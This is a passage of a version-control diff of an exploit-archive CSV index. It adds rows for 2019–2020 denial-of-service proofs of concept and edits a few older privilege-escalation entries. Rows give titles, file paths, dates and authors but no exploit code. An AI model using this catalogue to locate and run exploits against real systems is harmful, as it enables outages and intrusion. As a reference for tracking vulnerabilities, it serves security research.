+47259,exploits/windows/dos/47259.txt,"Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators",2019-08-15,"Google Security Research",dos,windows,
+47260,exploits/windows/dos/47260.txt,"Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts",2019-08-15,"Google Security Research",dos,windows,
+47261,exploits/windows/dos/47261.txt,"Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage",2019-08-15,"Google Security Research",dos,windows,
+47262,exploits/windows/dos/47262.txt,"Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx",2019-08-15,"Google Security Research",dos,windows,
+47263,exploits/windows/dos/47263.txt,"Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList",2019-08-15,"Google Security Research",dos,windows,
+47264,exploits/windows/dos/47264.txt,"Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables",2019-08-15,"Google Security Research",dos,windows,
+47265,exploits/windows/dos/47265.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure",2019-08-15,"Google Security Research",dos,windows,
+47266,exploits/windows/dos/47266.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList",2019-08-15,"Google Security Research",dos,windows,
+47267,exploits/windows/dos/47267.txt,"Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure",2019-08-15,"Google Security Research",dos,windows,
+47268,exploits/windows/dos/47268.txt,"Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList",2019-08-15,"Google Security Research",dos,windows,
+47269,exploits/windows/dos/47269.txt,"Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1",2019-08-15,"Google Security Research",dos,windows,
+47270,exploits/windows/dos/47270.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
+47271,exploits/windows/dos/47271.txt,"Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
+47272,exploits/windows/dos/47272.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF",2019-08-15,"Google Security Research",dos,windows,
+47273,exploits/windows/dos/47273.txt,"Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream",2019-08-15,"Google Security Research",dos,windows,
+47274,exploits/windows/dos/47274.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream",2019-08-15,"Google Security Research",dos,windows,
+47275,exploits/windows/dos/47275.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll",2019-08-15,"Google Security Research",dos,windows,
+47276,exploits/windows/dos/47276.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font",2019-08-15,"Google Security Research",dos,windows,
+47277,exploits/windows/dos/47277.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
+47278,exploits/windows/dos/47278.txt,"Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-08-15,"Google Security Research",dos,windows,
+47279,exploits/windows/dos/47279.txt,"Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
+47282,exploits/windows_x86-64/dos/47282.txt,"GetGo Download Manager 6.2.2.3300 - Denial of Service",2019-08-16,"Malav Vyas",dos,windows_x86-64,
+47285,exploits/windows/dos/47285.py,"RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service",2019-08-19,Achilles,dos,windows,
+47309,exploits/windows/dos/47309.py,"Outlook Password Recovery 2.10 - Denial of Service",2019-08-28,"Velayutham Selvaraj_ Praveen Thiyagarayam",dos,windows,
+47316,exploits/multiple/dos/47316.txt,"Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform",2019-08-29,"Google Security Research",dos,multiple,
+47318,exploits/windows/dos/47318.py,"SQL Server Password Changer 1.90 - Denial of Service",2019-08-30,"Velayutham Selvaraj_ Praveen Thiyagarayam",dos,windows,
+47319,exploits/windows/dos/47319.py,"Easy MP3 Downloader 4.7.8.8 - 'Unlock Code' Denial of Service",2019-08-30,"Mohan Ravichandran_ Snazzy Sanoj",dos,windows,
+47322,exploits/windows/dos/47322.py,"Asus Precision TouchPad 11.0.0.25 - Denial of Service",2019-08-30,"Athanasios Tserpelis",dos,windows,
+47328,exploits/windows/dos/47328.py,"VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service",2019-08-30,"James Chamberlain",dos,windows,
+47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows,
+47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows,
+47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows,
+47410,exploits/windows/dos/47410.py,"DeviceViewer 3.12.0.1 - 'creating user' Denial of Service",2019-09-24,x00pwn,dos,windows,
+47414,exploits/windows/dos/47414.txt,"Microsoft Windows cryptoapi - SymCrypt Modular Inverse Algorithm Denial of Service",2019-09-24,"Google Security Research",dos,windows,
+47415,exploits/ios/dos/47415.txt,"iMessage - Decoding NSSharedKeyDictionary Can Read Object Out of Bounds",2019-09-24,"Google Security Research",dos,ios,
+47418,exploits/windows/dos/47418.txt,"SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service",2019-09-25,"Emilio Revelo",dos,windows,
+47445,exploits/linux/dos/47445.py,"kic 2.4a - Denial of Service",2019-10-01,JosueEncinar,dos,linux,
+47450,exploits/multiple/dos/47450.txt,"WebKit - UXSS Using JavaScript: URI and Synchronous Page Loads",2019-10-01,"Google Security Research",dos,multiple,
+47451,exploits/multiple/dos/47451.html,"WebKit - Universal XSS in WebCore::command",2019-10-01,"Google Security Research",dos,multiple,
+47452,exploits/multiple/dos/47452.html,"WebKit - User-agent Shadow root Leak in WebCore::ReplacementFragment::ReplacementFragment",2019-10-01,"Google Security Research",dos,multiple,
+47453,exploits/multiple/dos/47453.txt,"WebKit - Universal XSS Using Cached Pages",2019-10-01,"Google Security Research",dos,multiple,
+47478,exploits/windows/dos/47478.py,"Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)",2019-10-09,"Alessandro Magnosi",dos,windows,
+47479,exploits/macos/dos/47479.txt,"XNU - Remote Double-Free via Data Race in IPComp Input Path",2019-10-09,"Google Security Research",dos,macos,
+47484,exploits/windows/dos/47484.txt,"Windows Kernel - win32k.sys TTF Font Processing Pool Corruption in win32k!ulClearTypeFilter",2019-10-10,"Google Security Research",dos,windows,
+47485,exploits/windows/dos/47485.txt,"Windows Kernel - NULL Pointer Dereference in nt!MiOffsetToProtos While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
+47486,exploits/windows/dos/47486.txt,"Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
+47487,exploits/windows/dos/47487.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
+47488,exploits/windows/dos/47488.txt,"Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
+47489,exploits/windows/dos/47489.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
+47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows,
+47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
+47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows,
+47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows,
+47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple,
+47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows,
+47565,exploits/multiple/dos/47565.txt,"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation",2019-10-30,"Google Security Research",dos,multiple,
+47578,exploits/macos/dos/47578.c,"Apple macOS 10.15.1 - Denial of Service (PoC)",2019-11-04,08Tc3wBB,dos,macos,
+47586,exploits/windows/dos/47586.py,"FileOptimizer 14.00.2524 - Denial of Service (PoC)",2019-11-05,SYANiDE,dos,windows,
+47590,exploits/multiple/dos/47590.txt,"JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects",2019-11-05,"Google Security Research",dos,multiple,
+47591,exploits/multiple/dos/47591.txt,"WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive",2019-11-05,"Google Security Research",dos,multiple,
+47592,exploits/macos/dos/47592.txt,"macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()",2019-11-05,"Google Security Research",dos,macos,
+47607,exploits/ios/dos/47607.c,"iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)",2019-11-11,"Sem Voigtlander",dos,ios,
+47608,exploits/multiple/dos/47608.txt,"iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address",2019-11-11,"Google Security Research",dos,multiple,
+47609,exploits/windows/dos/47609.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-11-11,"Google Security Research",dos,windows,
+47610,exploits/windows/dos/47610.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)",2019-11-11,"Google Security Research",dos,windows,
+47657,exploits/hardware/dos/47657.txt,"Siemens Desigo PX 6.00 - Denial of Service (PoC)",2019-11-14,LiquidWorm,dos,hardware,
+47662,exploits/windows/dos/47662.txt,"iSmartViewPro 1.3.34 - Denial of Service (PoC)",2019-11-18,"Ivan Marmolejo",dos,windows,
+47665,exploits/ios/dos/47665.py,"Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)",2019-11-18,"Luis Martínez",dos,ios,
+47671,exploits/windows/dos/47671.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-11-18,chuyreds,dos,windows,
+47674,exploits/windows/dos/47674.py,"ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)",2019-11-19,"Diego Armando Buztamante Rico",dos,windows,
+47677,exploits/hardware/dos/47677.sh,"Centova Cast 3.2.12 - Denial of Service (PoC)",2019-11-19,DroidU,dos,hardware,
+47678,exploits/ios/dos/47678.py,"scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)",2019-11-19,"Luis Martínez",dos,ios,
+47679,exploits/windows/dos/47679.py,"XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service",2019-11-19,ZwX,dos,windows,
+47692,exploits/linux/dos/47692.txt,"Ubuntu 19.10 - ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfs/shiftfs Error Path",2019-11-20,"Google Security Research",dos,linux,
+47693,exploits/linux/dos/47693.txt,"Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs",2019-11-20,"Google Security Research",dos,linux,
+47694,exploits/ios/dos/47694.txt,"iOS 12.4 - Sandbox Escape due to Integer Overflow in mediaserverd",2019-11-20,"Google Security Research",dos,ios,
+47707,exploits/windows/dos/47707.txt,"Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback",2019-11-22,"Google Security Research",dos,windows,
+47709,exploits/windows/dos/47709.py,"SMPlayer 19.5.0 - Denial of Service (PoC)",2019-11-25,"Malav Vyas",dos,windows,
+47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows,
+47716,exploits/ios/dos/47716.py,"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)",2019-11-26,"Ivan Marmolejo",dos,ios,
+47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows,
+47718,exploits/windows/dos/47718.py,"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
+47719,exploits/windows/dos/47719.py,"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
+47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios,
+47723,exploits/windows/dos/47723.py,"SpotAuditor 5.3.2 - 'Key' Denial of Service",2019-11-29,ZwX,dos,windows,
+47727,exploits/windows/dos/47727.py,"SpotAuditor 5.3.2 - 'Name' Denial of Service",2019-11-29,ZwX,dos,windows,
+47728,exploits/windows/dos/47728.py,"Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
+47732,exploits/windows/dos/47732.py,"Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
+47757,exploits/hardware/dos/47757.py,"Omron PLC 1.0.0 - Denial of Service (PoC)",2019-12-09,n0b0dy,dos,hardware,
+47766,exploits/windows/dos/47766.py,"Product Key Explorer 4.2.0.0 - 'Name' Denial of Service (POC)",2019-12-11,SajjadBnd,dos,windows,
+47767,exploits/windows/dos/47767.py,"Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (PoC)",2019-12-11,SajjadBnd,dos,windows,
+47768,exploits/windows/dos/47768.txt,"AppXSvc 17763 - Arbitrary File Overwrite (DoS)",2019-12-11,"Gabor Seljan",dos,windows,
+47769,exploits/windows/dos/47769.txt,"Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font",2019-12-11,"Google Security Research",dos,windows,
+47771,exploits/windows/dos/47771.c,"Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)",2019-12-12,"Nassim Asrir",dos,windows,
+47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
+47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
+47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 -  'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
+47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
+47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
+47848,exploits/windows/dos/47848.py,"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
+47853,exploits/windows/dos/47853.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47855,exploits/windows/dos/47855.py,"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47856,exploits/windows/dos/47856.py,"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47857,exploits/windows/dos/47857.py,"BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47859,exploits/windows/dos/47859.py,"ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47860,exploits/windows/dos/47860.py,"NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47861,exploits/windows/dos/47861.py,"Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47862,exploits/windows/dos/47862.py,"TextCrawler Pro3.1.1 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
+47863,exploits/windows/dos/47863.py,"RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47864,exploits/windows/dos/47864.py,"Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47865,exploits/windows/dos/47865.py,"RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47866,exploits/windows/dos/47866.py,"NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47867,exploits/windows/dos/47867.py,"Office Product Key Finder 1.5.4 - Denial of Service (PoC)",2020-01-06,Gokkulraj,dos,windows,
+47868,exploits/windows/dos/47868.py,"SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47869,exploits/windows/dos/47869.py,"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47870,exploits/windows/dos/47870.py,"SpotIM 2.2 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
+47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 -  Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows,
+47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
+47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows,
+47894,exploits/windows/dos/47894.py,"ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)",2020-01-09,ZwX,dos,windows,
+47904,exploits/windows/dos/47904.py,"SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)",2020-01-13,"Ismail Tasdelen",dos,windows,
+47906,exploits/windows/dos/47906.py,"SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)",2020-01-13,"Ismail Tasdelen",dos,windows,
+47907,exploits/windows/dos/47907.py,"Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)",2020-01-13,antonio,dos,windows,
+47909,exploits/windows/dos/47909.py,"Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)",2020-01-13,"Ismail Tasdelen",dos,windows,
+47911,exploits/windows/dos/47911.py,"TaskCanvas 1.4.0 - 'Registration' Denial Of Service",2020-01-13,"Ismail Tasdelen",dos,windows,
+47912,exploits/windows/dos/47912.py,"Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)",2020-01-13,antonio,dos,windows,
+47919,exploits/linux/dos/47919.txt,"Redir 3.3 - Denial of Service (PoC)",2020-01-14,hieubl,dos,linux,
+47920,exploits/android/dos/47920.txt,"WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM",2020-01-14,"Google Security Research",dos,android,
+47921,exploits/android/dos/47921.txt,"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN",2020-01-14,"Google Security Research",dos,android,
+47937,exploits/windows/dos/47937.py,"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
+47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
+47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
+47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple,
+47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows,
+47964,exploits/windows/dos/47964.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows,
+47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple,
+47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux,
+47993,exploits/ios/dos/47993.py,"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)",2020-02-03,"Ivan Marmolejo",dos,ios,
+47995,exploits/linux/dos/47995.txt,"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC)",2020-02-04,"Joe Vennix",dos,linux,
+48005,exploits/windows/dos/48005.py,"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48006,exploits/windows/dos/48006.py,"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48008,exploits/linux/dos/48008.txt,"VIM 8.2 - Denial of Service (PoC)",2020-02-06,"Dhiraj Mishra",dos,linux,
+48010,exploits/windows/dos/48010.py,"AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48011,exploits/windows/dos/48011.py,"TapinRadio 2.12.3 - 'address' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48013,exploits/windows/dos/48013.py,"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48014,exploits/windows/dos/48014.py,"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48015,exploits/windows/dos/48015.py,"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48031,exploits/windows/dos/48031.txt,"Dota 2 7.23f - Denial of Service (PoC)",2020-02-10,"Bogdan Kurinnoy",dos,windows,
+48034,exploits/linux/dos/48034.py,"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init",2020-02-10,"Google Security Research",dos,linux,
+48035,exploits/multiple/dos/48035.txt,"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()",2020-02-10,"Google Security Research",dos,multiple,
+48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows,
+48111,exploits/windows/dos/48111.py,"Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)",2020-02-24,"Cody Winkler",dos,windows,
+48121,exploits/linux/dos/48121.py,"Go SSH servers 0.0.2 - Denial of Service (PoC)",2020-02-24,"Mark Adams",dos,linux,
+48132,exploits/windows/dos/48132.py,"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
+48133,exploits/windows/dos/48133.py,"aSc TimeTables 2020.11.4 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
+48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows,
+48137,exploits/windows/dos/48137.py,"Core FTP LE 2.2 - Denial of Service (PoC)",2020-02-26,"Ismael Nava",dos,windows,
+48216,exploits/windows/dos/48216.md,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)",2020-03-14,eerykitty,dos,windows,
+48236,exploits/ios/dos/48236.py,"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)",2020-03-23,"Ivan Marmolejo",dos,ios,
+48237,exploits/windows/dos/48237.txt,"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)",2020-03-23,"Cem Onat Karagun",dos,windows,
+48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
+48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows,
+48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows,
+48284,exploits/windows/dos/48284.py,"Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48285,exploits/windows/dos/48285.py,"SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48286,exploits/windows/dos/48286.py,"Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48287,exploits/windows/dos/48287.py,"Frigate 3.36 - Denial of Service (PoC)",2020-04-06,inter,dos,windows,
+48288,exploits/windows/dos/48288.py,"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
+48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -6514,7 +6843,7 @@ id,file,description,date,author,type,platform,port
 591,exploits/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,local,linux,
 600,exploits/linux/local/600.c,"GD Graphics Library - Local Heap Overflow",2004-10-26,anonymous,local,linux,
 601,exploits/linux/local/601.c,"libxml 2.6.12 nanoftp - Local Buffer Overflow",2004-10-26,infamous41md,local,linux,
-602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon Valle",local,sco,
+602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon de C Valle",local,sco,
 624,exploits/linux/local/624.c,"Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read",2004-11-10,"Paul Starzetz",local,linux,
 629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple,
 657,exploits/linux/local/657.c,"atari800 - Local Privilege Escalation",2004-11-25,pi3,local,linux,
@@ -6857,7 +7186,7 @@ id,file,description,date,author,type,platform,port
 4178,exploits/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Local Privilege Escalation",2007-07-12,"Zohiartze Herce",local,windows,
 4203,exploits/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords",2007-07-19,bunker,local,multiple,
 4204,exploits/windows/local/4204.php,"PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow",2007-07-20,shinnai,local,windows,
-4218,exploits/windows/local/4218.php,"PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass",2007-07-24,shinnai,local,windows,
+4218,exploits/windows/local/4218.php,"PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / disable_functions  Bypass",2007-07-24,shinnai,local,windows,
 4229,exploits/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",local,windows,
 4231,exploits/aix/local/4231.c,"IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,local,aix,
 4232,exploits/aix/local/4232.sh,"IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,local,aix,
@@ -6884,9 +7213,9 @@ id,file,description,date,author,type,platform,port
